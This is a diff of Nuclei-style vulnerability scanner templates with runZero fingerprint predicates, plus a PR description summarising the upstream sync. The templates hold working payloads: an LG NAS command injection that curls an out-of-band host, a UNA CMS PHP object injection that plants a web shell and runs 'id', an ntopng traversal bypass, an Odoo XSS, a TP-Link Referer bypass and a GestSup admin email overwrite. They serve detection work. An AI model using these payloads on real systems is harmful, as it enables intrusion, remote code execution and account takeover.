+  author: eeche,chae1xx1os,persona-twotwo,soonghee2,gy741
+  severity: critical
+  description: GestSup contains an authentication bypass vulnerability allowing attackers to take over user accounts, leading to full compromise including data disclosure and modification.
+  impact: |
+    An attacker could bypass the authentication process and access the application as an administrator user by modifying the usermail field to a controlled email address and requesting a password reset.
+  remediation: Apply necessary security patches or updates provided by the vendor to secure the ticket_user_db.php endpoint and ensure proper authentication checks are in place.
+  reference:
+    - https://www.synacktiv.com/advisories/multiple-vulnerabilities-on-gestsup-3244
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23163
+    - https://doc.gestsup.fr/install/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-287
+    cpe: cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:*
+  metadata:
+    runzero-match: service["favicon.ico.image.mmh3"] == "-283003760"
+    fofa-query: title="GestSup"
+    max-request: 1
+    product: gestsup
+    shodan-query: http.favicon.hash:-283003760
+    vendor: gestsup
+    verified: true
+  tags: account-takeover,gestsup,vuln
+variables:
+  email: "{{randstr}}@{{rand_base(5)}}.com"
+  firstname: "{{rand_base(5)}}"
+  lastname: "{{rand_base(5)}}"
+http:
+  - raw:
+      - |
+        POST /ajax/ticket_user_db.php HTTP/1.1
+        Host: {{Hostname}}
+        X-Requested-With: xmlhttprequest
+        Content-Type: application/x-www-form-urlencoded
+
+        modifyuser=1&lastname={{lastname}}&firstname={{firstname}}&phone=&mobile=&mail={{email}}&company=111&id=1
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{"status":"success'
+          - 'firstname":"{{firstname}}","lastname":"{{lastname}}'
+        condition: and
+      - type: word
+        part: header
+        words:
+          - 'text/html'
+    extractors:
+      - type: dsl
+        dsl:
+          - '"Firstname: "+ firstname'
+          - '"Lastname: "+ lastname'
+        # digest: 4b0a004830460221008edfd9864003c6f7b01bfe5fe1bfccb3298e6dc1624a426ca8d2805385864be1022100cc5c4b9852e70111619b23ecc9b742aec0dff7f37a4f7fa6f5827073957f7c5e:922c64590222798bb761d5b6d8e72950

--- a/http/vulnerabilities/lg-nas-rce.yaml
+++ b/http/vulnerabilities/lg-nas-rce.yaml
@@ -11,10 +11,19 @@ info:
   reference:
     - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
     - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10818
+    - https://www.cve.org/CVERecord?id=CVE-2018-14839
+  classification:
+    cve-id: CVE-2018-14839
+    cwe-id: CWE-78
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    epss-score: 0.89354
+    epss-percentile: 0.99771
+    cpe: cpe:2.3:o:lg:n1a1_firmware:3718.510:*:*:*:*:*:*:*,cpe:2.3:h:lg:n1a1:-:*:*:*:*:*:*:*
   metadata:
     max-request: 2
-  tags: injection,lg-nas,oast,rce,vuln
+    runzero-match: asset["hw_vendor"] == "LG" && asset["type"] == "NAS"
+  tags: injection,lg-nas,oast,rce,vuln,kev
 variables:
   useragent: '{{rand_base(6)}}'
 http:

--- a/http/vulnerabilities/lg-nas-rce.yaml
+++ b/http/vulnerabilities/lg-nas-rce.yaml
@@ -1,0 +1,45 @@
+id: lg-nas-rce
+info:
+  name: LG NAS Devices - Remote Code Execution
+  author: gy741
+  severity: critical
+  description: LG NAS devices contain a pre-auth remote command injection via the "password" parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.
+  remediation: |
+    Apply the latest firmware update provided by LG to mitigate this vulnerability.
+  reference:
+    - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
+    - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10818
+  metadata:
+    max-request: 2
+  tags: injection,lg-nas,oast,rce,vuln
+variables:
+  useragent: '{{rand_base(6)}}'
+http:
+  - raw:
+      - |
+        POST /system/sharedir.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'
+      - |
+        POST /en/php/usb_sync.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"
+      - type: word
+        part: interactsh_request
+        words:
+          - "User-Agent: {{useragent}}"
+        # digest: 4a0a00473045022100d122c896ac5a0dea8d30eaf3d3b3ddb47c8c6f4b6d5895e49edde2b0c1170f25022023a5557b043da5834b6637008e44b370ca6a70f9c7e7562ee3c54df0cb80d351:922c64590222798bb761d5b6d8e72950

--- a/http/vulnerabilities/ntopng-auth-bypass.yaml
+++ b/http/vulnerabilities/ntopng-auth-bypass.yaml
@@ -8,10 +8,12 @@ info:
     Successful exploitation of this vulnerability could result in unauthorized access to sensitive information and potential compromise of the affected system.
   remediation: Upgrade to version 4.3 or later.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-27573
     - http://noahblog.360.cn/ntopng-multiple-vulnerabilities/
     - https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md
+  classification:
+    cve-id: CVE-2021-28073
   metadata:
+    runzero-match: service["product"] matches "^ntop:ntopng"
     max-request: 2
   tags: ntopng,vuln
 http:

--- a/http/vulnerabilities/ntopng-auth-bypass.yaml
+++ b/http/vulnerabilities/ntopng-auth-bypass.yaml
@@ -1,0 +1,37 @@
+id: ntopng-auth-bypass
+info:
+  name: Ntopng Authentication Bypass
+  author: z3bd
+  severity: critical
+  description: Ntopng, a passive network monitoring tool, contains an authentication bypass vulnerability in ntopng <= 4.2
+  impact: |
+    Successful exploitation of this vulnerability could result in unauthorized access to sensitive information and potential compromise of the affected system.
+  remediation: Upgrade to version 4.3 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-27573
+    - http://noahblog.360.cn/ntopng-multiple-vulnerabilities/
+    - https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md
+  metadata:
+    max-request: 2
+  tags: ntopng,vuln
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css"
+      - "{{BaseURL}}/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "application/json"
+        part: header
+      - type: word
+        words:
+          - '"results":'
+          - '"name":'
+          - '"tab":'
+        condition: and
+      - type: status
+        status:
+          - 200
+        # digest: 4b0a00483046022100cef20eef40ea371a7ab8d435f82516aba802f2947bfaeb23c506bcf75eea22a0022100a700e13856e255362dc66af5893699ccc8495425fe7ce721018ed9a5be2c7565:922c64590222798bb761d5b6d8e72950

--- a/http/vulnerabilities/odoo-xss.yaml
+++ b/http/vulnerabilities/odoo-xss.yaml
@@ -1,0 +1,46 @@
+id: odoo-xss
+info:
+  name: Odoo - Cross-Site Scripting
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
+  remediation: |
+    Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
+  reference:
+    - https://www.sonarsource.com/blog/odoo-get-your-content-type-right-or-else
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1434
+  classification:
+    cwe-id: CWE-79
+    cpe: cpe:2.3:a:odoo:odoo:*:*:*:*:*:*:*:*
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Odoo"})
+    max-request: 1
+    product: odoo
+    shodan-query: title:"Odoo"
+    vendor: odoo
+    verified: true
+  tags: odoo,vkev,vuln,xss
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<script>alert(document.domain)</script>'
+          - '"params":'
+          - 'session'
+        condition: and
+      - type: word
+        part: header
+        words:
+          - "text/html"
+      - type: status
+        status:
+          - 200
+        # digest: 4a0a0047304502200dd0db293a31ce23c29e4bff79113f351c10b55565442fcad17adefe24468237022100f0eb5b69f728da001807aebaea58baaceeed87161601e66e905840624a4bdb09:922c64590222798bb761d5b6d8e72950

--- a/http/vulnerabilities/odoo-xss.yaml
+++ b/http/vulnerabilities/odoo-xss.yaml
@@ -16,7 +16,7 @@ info:
     cwe-id: CWE-79
     cpe: cpe:2.3:a:odoo:odoo:*:*:*:*:*:*:*:*
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Odoo"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^Odoo$"})
     max-request: 1
     product: odoo
     shodan-query: title:"Odoo"

--- a/http/vulnerabilities/tp-link-wr840n-auth-bypass.yaml
+++ b/http/vulnerabilities/tp-link-wr840n-auth-bypass.yaml
@@ -1,4 +1,4 @@
-id: tp-link-wr840n-auth-bypass
+id: cve-2018-11714
 info:
   name: TP-LINK WR840N v6 up to 0.9.1 4.16 - Improper Authentication
   author: DhiyaneshDK
@@ -11,15 +11,18 @@ info:
     Update TP-Link WR840N v6 router to firmware version later than 0.9.1 4.16 that addresses the authentication bypass vulnerability.
   reference:
     - https://github.com/Shuanunio/CVE_Requests/blob/main/TP-Link/WR840N%20v6/ACL%20bypass%20Vulnerability%20in%20TP-Link%20TL-WR840N.md
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-57050
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-11714
+    - https://www.exploit-db.com/exploits/44781/
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cve-id: CVE-2018-11714
+    cwe-id: CWE-384
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
-    cwe-id: CWE-287
-    epss-score: 0.00043
-    epss-percentile: 0.1187
+    epss-score: 0.35365
+    epss-percentile: 0.98312
+    cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:0.9.1_3.16:*:*:*:*:*:*:*,cpe:2.3:h:tp-link:tl-wr840n:5.0:*:*:*:*:*:*:*,cpe:2.3:o:tp-link:tl-wr841n_firmware:0.9.1_4.16:*:*:*:*:*:*:*,cpe:2.3:h:tp-link:tl-wr841n:13.0:*:*:*:*:*:*:*
   metadata:
-    runzero-match: any(each(service["http.bodies"]), {# matches "WR840N"})
+    runzero-match: asset["hw_vendor"] == "TP-Link" && asset["hw_product"] == "WR840N"
     fofa-query: body="WR840N"
     max-request: 1
     verified: true

--- a/http/vulnerabilities/tp-link-wr840n-auth-bypass.yaml
+++ b/http/vulnerabilities/tp-link-wr840n-auth-bypass.yaml
@@ -1,0 +1,48 @@
+id: tp-link-wr840n-auth-bypass
+info:
+  name: TP-LINK WR840N v6 up to 0.9.1 4.16 - Improper Authentication
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    A vulnerability in the TP-Link WR840N v6 router with firmware version 0.9.1 4.16 and earlier permits unauthorized individuals to bypass the authentication of some interfaces under the /cgi directory.When adding Referer- http-//tplinkwifi.net to the the request, it will be recognized as passing the authentication.
+  impact: |
+    Unauthenticated attackers can bypass authentication by adding a specific Referer header, gaining unauthorized access to router administrative interfaces.
+  remediation: |
+    Update TP-Link WR840N v6 router to firmware version later than 0.9.1 4.16 that addresses the authentication bypass vulnerability.
+  reference:
+    - https://github.com/Shuanunio/CVE_Requests/blob/main/TP-Link/WR840N%20v6/ACL%20bypass%20Vulnerability%20in%20TP-Link%20TL-WR840N.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-57050
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-287
+    epss-score: 0.00043
+    epss-percentile: 0.1187
+  metadata:
+    runzero-match: any(each(service["http.bodies"]), {# matches "WR840N"})
+    fofa-query: body="WR840N"
+    max-request: 1
+    verified: true
+  tags: auth-bypass,tp-link,vuln
+http:
+  - raw:
+      - |
+        POST /cgi/getParm HTTP/1.1
+        Host: {{Hostname}}
+        Referer: http://tplinkwifi.net
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "$.ret=0;"
+          - "var "
+        condition: and
+      - type: word
+        part: content_type
+        words:
+          - "application/javascript"
+      - type: status
+        status:
+          - 200
+        # digest: 4b0a00483046022100e6dad8b014b152ecc310270a18028a716fa48b8f15243059bacf4fe382cd7cf7022100eb32fdcbec9a91d9bf722d0c59d3a756513202fe4ca2edfad7f754646ac6a3ba:922c64590222798bb761d5b6d8e72950

--- a/http/vulnerabilities/una-cms-rce.yaml
+++ b/http/vulnerabilities/una-cms-rce.yaml
@@ -1,0 +1,66 @@
+id: una-cms-rce
+info:
+  name: UNA CMS <= 14.0.0-RC4 - PHP Object Injection
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    The vulnerability is located in the /template/scripts/BxBaseMenuSetAclLevel.php script. Specifically, within the BxBaseMenuSetAclLevel::getCode() method. When calling this method, user input passed through the "profile_id" POST parameter is not properly sanitized before being used in a call to the unserialize() PHP function. This can be exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as writing and executing arbitrary PHP code.
+  impact: |
+    Unauthenticated attackers can inject arbitrary PHP objects through the profile_id parameter, allowing remote code execution and complete server compromise.
+  remediation: |
+    Upgrade to UNA CMS version 14.0.0 or later that properly validates and sanitizes serialized input.
+  reference:
+    - https://www.exploit-db.com/exploits/52139
+    - https://karmainsecurity.com/KIS-2025-01
+  metadata:
+    runzero-match: any(each(service["http.bodies"]), {# matches "Powered by UNA"})
+    fofa-query: body="Powered by UNA"
+    max-request: 3
+    verified: true
+  tags: php,rce,una-cms,vuln
+variables:
+  cmd: "echo '{{randstr}}'. system('id') . '{{randstr}}';"
+http:
+  - raw:
+      - |
+        POST /menu.php HTTP/1.1
+        Host: {{Hostname}}
+        X-Requested-With: XMLHttpRequest
+        Content-Type: application/x-www-form-urlencoded
+
+        o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=O%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A3%3A%7Bs%3A40%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A2%3A%7Bs%3A7%3A%22Expires%22%3Bs%3A0%3A%22%22%3Bs%3A5%3A%22Value%22%3Bs%3A49%3A%22%3C%3Fphp+eval%28base64_decode%28%24_SERVER%5B%27HTTP_X%27%5D%29%29%3B+%3F%3E%22%3B%7D%7D%7Ds%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A23%3A%22.%2Fcache_public%2Fsh.phtml%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7D
+    matchers:
+      - type: status
+        status:
+          - 200
+        internal: true
+  - raw:
+      - |
+        GET /cache_public/sh.phtml HTTP/1.1
+        Host: {{Hostname}}
+        X-Requested-With: XMLHttpRequest
+        X: {{base64(cmd)}}
+      - |
+        GET /cache_public/sh.php HTTP/1.1
+        Host: {{Hostname}}
+        X-Requested-With: XMLHttpRequest
+        X: {{base64(cmd)}}
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Expires'
+          - 'Value'
+          - 'uid='
+          - 'groups='
+        condition: and
+    extractors:
+      - type: regex
+        part: body
+        internal: false
+        name: id
+        group: 1
+        regex:
+          - '{{randstr}}(.*){{randstr}}'
+        # digest: 4a0a00473045022029ec684aa03ff28a945a2b1c35c94c1666a69d123d0b7605bf690f81c1b644d70221008d40ff17baeeaf4161e36ec0200cb3b1c330922b579af156ece0c5aac4512c0a:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
## Upstream Sync — Semantic Changes

> Targets the general branch. Review before merging.

### New templates — auto-generated match (10)

| Template | Severity | Notable tags | Note |
|---|---|---|---|
| `http/vulnerabilities/geoserver/geoserver-jsonarraycontains-sqli.yaml` | 🔴 critical | kev, vkev | — |
| `http/cves/2026/CVE-2026-40280.yaml` | 🔴 critical | — | — |
| `http/cves/2026/CVE-2026-27542.yaml` | 🔴 critical | vkev | — |
| `http/vulnerabilities/odoo-xss.yaml` | 🟡 medium | vkev | — |
| `http/cves/2025/CVE-2025-26399.yaml` | 🔴 critical | kev, vkev | — |
| `http/exposed-panels/shiori-panel.yaml` | ⚪ info | panel | — |
| `http/vulnerabilities/gestsup-account-takeover.yaml` | 🔴 critical | — | — |
| `http/cves/2024/CVE-2024-57726.yaml` | 🔴 critical | kev, vkev | — |
| `http/vulnerabilities/una-cms-rce.yaml` | 🔴 critical | — | — |
| `http/vulnerabilities/tp-link-wr840n-auth-bypass.yaml` | 🔴 critical | — | — |

### New templates — needs manual annotation (3)

| Template | Severity | Notable tags | Note |
|---|---|---|---|
| `http/vulnerabilities/lg-nas-rce.yaml` | 🔴 critical | — | — |
| `http/vulnerabilities/ntopng-auth-bypass.yaml` | 🔴 critical | — | — |
| `http/cves/2026/CVE-2026-45298.yaml` | 🟠 high | vkev | _(became interesting: gained vkev tag)_ |

### Existing runZero templates — semantic changes (4)

| Template | Change |
|---|---|
| `http/cves/2024/CVE-2024-13985.yaml` | tags: -"kev" |
| `http/exposed-panels/argocd-login.yaml` | http: changed |
| `http/cves/2026/CVE-2026-3395.yaml` | http: changed |
| `http/cves/2026/CVE-2026-3395.yaml` | tags: -"kev" |
| `http/cves/2026/CVE-2026-21858.yaml` | flow: added "http(1) || http(2)" |
| `http/cves/2026/CVE-2026-21858.yaml` | http: changed |
| `http/cves/2026/CVE-2026-21858.yaml` | tags: -"passive" |
| `http/cves/2026/CVE-2026-21858.yaml` | tags: -"vkev" |

### Removed templates with active `runzero-match` (6)

| Template |
|---|
| `http/cves/2023/CVE-2023-39120.yaml` |
| `http/cves/2025/CVE-2025-32101.yaml` |
| `http/cves/2021/CVE-2021-27748.yaml` |
| `http/cves/2024/CVE-2024-12760.yaml` |
| `http/cves/2024/CVE-2024-57050.yaml` |
| `http/vulnerabilities/dahua/dahua-eims-rce.yaml` |

---

### ⚠️ Action items (19)

- [x] `http/cves/2024/CVE-2024-57726.yaml` — auto-generated `runzero-match` (kev, vkev critical); please verify
- [x] `http/cves/2025/CVE-2025-26399.yaml` — auto-generated `runzero-match` (kev, vkev critical); please verify
- [x] `http/cves/2026/CVE-2026-27542.yaml` — auto-generated `runzero-match` (vkev critical); please verify
- [x] `http/cves/2026/CVE-2026-40280.yaml` — auto-generated `runzero-match` (critical); please verify
- [x] `http/cves/2026/CVE-2026-45298.yaml` — vkev high (gained vkev tag); no predicate could be generated
- [x] `http/exposed-panels/shiori-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/vulnerabilities/geoserver/geoserver-jsonarraycontains-sqli.yaml` — auto-generated `runzero-match` (kev, vkev critical); please verify
- [x] `http/vulnerabilities/gestsup-account-takeover.yaml` — auto-generated `runzero-match` (critical); please verify
- [x] `http/vulnerabilities/lg-nas-rce.yaml` — critical; no predicate could be generated
- [x] `http/vulnerabilities/ntopng-auth-bypass.yaml` — critical; no predicate could be generated
- [x] `http/vulnerabilities/odoo-xss.yaml` — auto-generated `runzero-match` (vkev medium); please verify
- [x] `http/vulnerabilities/tp-link-wr840n-auth-bypass.yaml` — auto-generated `runzero-match` (critical); please verify
- [x] `http/vulnerabilities/una-cms-rce.yaml` — auto-generated `runzero-match` (critical); please verify
- [x] ⚠️ `http/cves/2021/CVE-2021-27748.yaml` — removed upstream; had active `runzero-match`
- [x] ⚠️ `http/cves/2023/CVE-2023-39120.yaml` — removed upstream; had active `runzero-match`
- [x] ⚠️ `http/cves/2024/CVE-2024-12760.yaml` — removed upstream; had active `runzero-match`
- [x] ⚠️ `http/cves/2024/CVE-2024-57050.yaml` — removed upstream; had active `runzero-match`
- [x] ⚠️ `http/cves/2025/CVE-2025-32101.yaml` — removed upstream; had active `runzero-match`
- [x] ⚠️ `http/vulnerabilities/dahua/dahua-eims-rce.yaml` — removed upstream; had active `runzero-match`
